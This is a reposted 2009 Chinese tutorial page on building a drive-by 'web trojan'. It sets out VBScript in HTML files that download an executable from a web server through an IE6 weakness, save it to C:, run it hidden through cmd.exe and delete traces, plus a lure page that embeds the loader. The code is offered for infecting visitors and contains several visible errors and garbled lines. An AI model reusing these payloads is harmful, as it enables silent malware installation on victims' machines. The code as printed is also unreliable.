当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 网页木马制作讲解(菜鸟版本)

安全基础
IE浏览器防黑十大秘籍,黑客也没招
网络工程师讲解系统安全漏洞的形成和防治
清除导致XP系统反复重启的新网银木马
识破QQ欺骗网络地址的几种方法汇总
安全基础知识 细说暴库的原理与方法
排除无线突然中断故障实例
强搜天线 搜出WiFi世界的安全漏洞
网管应用技巧 内网安全十大策略说明
如何修改局域网内部打印机的IP地址
如何找出IIS中隐藏的网站
EFS加密技术的概念分析及一次解密经过
提高Windows XP系统安全性要关闭的10种服务
PHPBB 2.0.22 MOD版最新注入漏洞
修复Windows系统忘记密码的9个高招
用SockOnline软件轻松突破端口限制
安全基础知识 最强0到33600端口详解
执行文件方式加密FLASH文件的解密方法
网吧被入侵后的应对解决方法
网页“黑手”如何攻击你的Windows系统
不要让别人读了你的信 谈私密数据保护

安全基础 中的 网页木马制作讲解(菜鸟版本)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 34 ::
收藏到网摘: n/a

 我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.

首先我们需要编写几个简单的文件

一、名字为abc.abc的文件


<html>
<script language="vbscript">
Function HttpDoGet(url)
   set oReq = CreateObject("Microsoft.XMLHTTP")
   oReq.open "GET",url,false
   oReq.send
   If oReq.status=200 then
          HttpDoGet=oReq.respomseBody
          Savefile HttpDoGet,"c:\win.exe"
   End If
   Set oReq=nothing
End Function
sub SaveFile(str.fName)
   Set objStream = CreateObject("ADODB.Stream")
   objStream.Type =1
   objStream.Open
   objStream.write str
   objStream.SaveToFile fName.2
   objStream.Close()
   set objStream = nothing
   exewin()
End sub
Sub exewin()
   set wshshell=createobject ("wscript.shell" )
   a=wshshell.run ("cmd.exe /c c:\win.exe",0)
   b=wshshell.run ("cmd.exe /c del c:\win.hta",0)
   window.close
End Sub
HttpDoGet "http://127.0.0.1/test.exe"
</script>
</html>

其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。

二、名字为test.htm的文件

<html><body>
木马运行测试!(这句话可以改成你想说的)
<object date="http://127.0.0.1/win.test";;;></object>
</body></html>

三、名字为win.test的文件


<html>
<body>
<script language="vbscript">
Function HttpDoGet(url)
   set oReq = CreateObject("Microsoft.XMLHTTP")
   oReq.open "GET",url,false
   oReq.send
   If oReq.status=200 then
          HttpDoGet,"c:\win.hta"
          Set oReq=nothing
   End if
end function
sub SaveFile(str,fName)
   Dim fso, tf
   S e t    f s o    =    C r e a t e O b j e c t(Scripting.FileSystemObject")
   Set tf = fso.CreateTextfile(fName,True)
   tf.Write str
   tf.Close
   exewin()
End sub
Sub exewin()
   set wshshell=createobject ("wscript.shell" )
   a=wshshell.run ("cmd.exe /c c:\win.hat",0)
   window.close
End Sub
HttpDoGet("http://127.0.0.1/abc.abc")
</script>
</body>
</html>